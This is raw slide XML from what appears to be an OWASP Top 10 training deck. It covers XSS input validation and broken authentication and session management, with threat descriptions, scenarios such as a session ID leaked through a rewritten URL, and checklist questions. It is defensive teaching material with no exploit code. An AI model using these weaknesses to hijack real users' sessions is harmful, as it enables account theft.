              </a:rPr>
              <a:t>Positive or “</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>whitelist</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>” input validation with appropriate canonicalization and decoding is also recommended as it helps protect against XSS, but is </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" u="sng" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>not a complete defense </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>as many applications require special characters in their input. Such validation should, as much as possible, decode any encoded input, and then validate the length, characters, format, and any business rules on that data before accepting the input.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="26" name="Title 25"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Cross-Site Scripting (XSS)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="27" name="Text Placeholder 26"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>A2</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="28" name="Group 27"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="304800" y="1014596"/>
            <a:ext cx="6380328" cy="585604"/>
            <a:chOff x="304800" y="997424"/>
            <a:chExt cx="6380328" cy="585604"/>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34" name="Group 63"/>
            <p:cNvGrpSpPr>
              <a:grpSpLocks/>
            </p:cNvGrpSpPr>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr bwMode="auto">
            <a:xfrm>
              <a:off x="476250" y="997426"/>
              <a:ext cx="139699" cy="304801"/>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44"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45"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46"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47"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nvGraphicFramePr>
        <p:xfrm>
          <a:off x="0" y="956458"/>
          <a:ext cx="6858000" cy="25284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3742">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:endParaRPr lang="en-US" sz="100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dirty="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3086">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Detectability</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1000" b="1" dirty="0" smtClean="0">
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>
                        </a:solidFill>
                      </a:endParaRP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2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__________</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1000" b="1"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75203">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anonymous external attackers, as well as users with their own accounts, who may attempt to steal accounts from others. Also consider insiders wanting to disguise their actions.</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="100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n-US" sz="1000" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>Attacker uses leaks</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t> or flaws in the authentication or session management functions (e.g., exposed accounts, passwords, session IDs) to impersonate users.</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n-US" sz="1000" b="0" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>Developers frequently build custom authentication and session management schemes, but building these correctly is hard. As a result, these custom schemes frequently have flaws in areas such as logout, password management, timeouts, remember me, secret question, account update, etc. Finding such flaws can sometimes be difficult, as each implementation is unique.</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1000" b="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may allow some or even </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" u="sng" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>all</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t> accounts to be attacked</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>. Once successful, the attacker can do anything the victim could do. Privileged accounts are frequently targeted.</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="100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or application functions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u="sng" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Scenario #1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>: Airline reservations application supports URL rewriting, putting session IDs in the URL:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="200"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
              </a:rPr>
              <a:t>http://example.com/sale/saleitems;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>jsessionid=</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1000" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1000" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>  2P0OC2JDPXM0OQSNDLPSKHCJUN2JV</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
              </a:rPr>
              <a:t>?dest=Hawaii</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="1">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="200"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>An authenticated user of the site wants to let his friends know about the sale. He e-mails the above link without knowing he is also giving away his session ID. When his friends use the link they will use his session and credit card.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1000" b="1" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="C00000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="200"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" u="sng" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Scenario #2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>: Application’s timeouts aren’t set properly. User uses a public computer to access site. Instead of selecting “logout” the user simply closes the browser tab and walks away. Attacker uses the same browser an hour later, and that browser is still authenticated.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="200"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" u="sng" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Scenario #3</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>: Insider or external attacker gains access to the system’s password database. User passwords are not encrypted, exposing every users’ password to the attacker.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="108" name="Rectangle 107"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="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primary assets to protect are credentials and session IDs.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="228600" indent="-228600">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Are credentials always protected when stored using hashing or encryption? See A7.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1000" b="1" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="228600" indent="-228600">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Can credentials be guessed or overwritten through weak account management functions (e.g., account creation, change password, recover password, weak session IDs)?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="228600" indent="-228600">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Are session IDs exposed in the URL (e.g., URL rewriting)?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="228600" indent="-228600">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Are session IDs vulnerable to session fixation attacks? </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="228600" indent="-228600">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Do session IDs timeout and can users log out?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="228600" indent="-228600">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Are session IDs rotated after successful login?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="228600" indent="-228600">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Are passwords, session IDs, and other credentials sent only over TLS connections? See A9.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1000" b="1" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-228600">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>See the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>ASVS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> requirement areas V2 and V3 for more details.</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5"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>For a more complete set of requirements and problems to avoid in this area, see the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>ASVS requirements areas for Authentication (V2) and Session Management (V3)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>.</a:t>
            </a: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Authentication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Authenticator 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ESAPI User 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Development Guide: Chapter on Authentication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OWASP Testing Guide: Chapter on Authentication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287 on Improper Authentication</a:t>
            </a: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The primary recommendation for an organization is to make available to developers:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="228600" indent="-228600">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>A single set of strong authentication and session management controls</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>. Such controls should strive to:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" indent="-228600">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="alphaLcParenR"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>meet all the authentication and session management requirements defined in OWASP’s </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>Application Security Verification Standard</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> (ASVS) areas V2 (Authentication) and V3 (Session Management).</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" indent="-228600">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="alphaLcParenR"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>have a simple interface for developers. Consider the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId7"/>
              </a:rPr>
              <a:t>ESAPI Authenticator and User APIs</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> as good examples to emulate, use, or build upon.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="228600" indent="-228600">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Strong efforts should also be made to avoid XSS flaws which can be used to steal session IDs. See A2.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1000" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="28" name="Title 27"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Broken Authentication and Session Management</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="33" name="Text Placeholder 32"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>A3</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="53" name="Group 52"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="304800" y="1014596"/>
            <a:ext cx="6380328" cy="585604"/>
            <a:chOff x="304800" y="997424"/>
            <a:chExt cx="6380328" cy="585604"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="54" name="Group 115"/>
            <p:cNvGrpSpPr>
              <a:grpSpLocks/>
            </p:cNvGrpSpPr>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr bwMode="auto">
            <a:xfrm>
              <a:off x="2450457" y="1073877"/>
              <a:ext cx="1449386" cy="381000"/>
              <a:chOff x="2418" y="2736"/>
              <a:chExt cx="750" cy="288"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="70"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t>       </a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="en-US" sz="900" b="1" dirty="0" smtClean="0"/>
                  <a:t>    Security</a:t>
                </a:r>
                <a:br>
                  <a:rPr lang="en-US" sz="900" b="1" dirty="0" smtClean="0"/>
                </a:br>
                <a:r>
                  <a:rPr lang="en-US" sz="900" b="1" dirty="0" smtClean="0"/>
                  <a:t>          Weakness</a:t>
                </a:r>
                <a:endParaRPr lang="en-US" sz="900" b="1" dirty="0"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="71"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grpSp>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="55" name="Group 63"/>
            <p:cNvGrpSpPr>
              <a:grpSpLocks/>
            </p:cNvGrpSpPr>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr bwMode="auto">
            <a:xfrm>
              <a:off x="476250" y="997426"/>
              <a:ext cx="139699" cy="304801"/>
              <a:chOff x="96" y="1344"/>
              <a:chExt cx="288" cy="624"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="64"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n-US" sz="900" b="1"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="66"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n-US" sz="900" b="1"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="67"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n-US" sz="900" b="1"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="68"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n-US" sz="900" b="1"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="69"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n-US" sz="900" b="1"/>
              </a:p>
            </p:txBody>
          </p:sp>
        </p:grpSp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="56"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t>    Attack</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr eaLnBrk="0" hangingPunct="0"/>
              <a:r>
                <a:rPr lang="en-US" sz="900" b="1" dirty="0"/>
                <a:t> </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="900" b="1" dirty="0" smtClean="0"/>
                <a:t>   Vectors</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="900" b="1" dirty="0"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="57"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cs typeface="+mn-cs"/>
                </a:rPr>
                <a:t> Technical</a:t>
              </a:r>
              <a:br>
                <a:rPr lang="en-US" sz="900" b="1" dirty="0" smtClean="0">
                  <a:cs typeface="+mn-cs"/>
                </a:rPr>
              </a:br>
              <a:r>
                <a:rPr lang="en-US" sz="900" b="1" dirty="0" smtClean="0">
                  <a:cs typeface="+mn-cs"/>
                </a:rPr>
                <a:t>   Impacts</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="900" b="1" dirty="0">
                <a:cs typeface="+mn-cs"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="58"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9"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60" name="AutoShape 140"/>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks noChangeShapeType="1"/>
              <a:stCxn id="70"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61"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bg1"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>Threat</a:t>
              </a:r>
              <a:br>
                <a:rPr lang="en-US" sz="900" b="1" dirty="0" smtClean="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                </a:rPr>
              </a:br>
              <a:r>
                <a:rPr lang="en-US" sz="900" b="1" dirty="0" smtClean="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>Agents</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="900" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="62"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t>Business</a:t>
              </a:r>
              <a:br>
                <a:rPr lang="en-US" sz="900" b="1" dirty="0" smtClean="0"/>
              </a:br>
              <a:r>
                <a:rPr lang="en-US" sz="900" b="1" dirty="0" smtClean="0"/>
                <a:t>Impacts</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="900" b="1" dirty="0"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="63" name="AutoShape 149"/>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks noChangeShapeType="1"/>
              <a:endCxn id="62"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10/09/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6/24/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13/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3/2010" val="LastModified"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag7.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="03/13/2010" val="LastModified"/>
</p:tagLst>
</file>

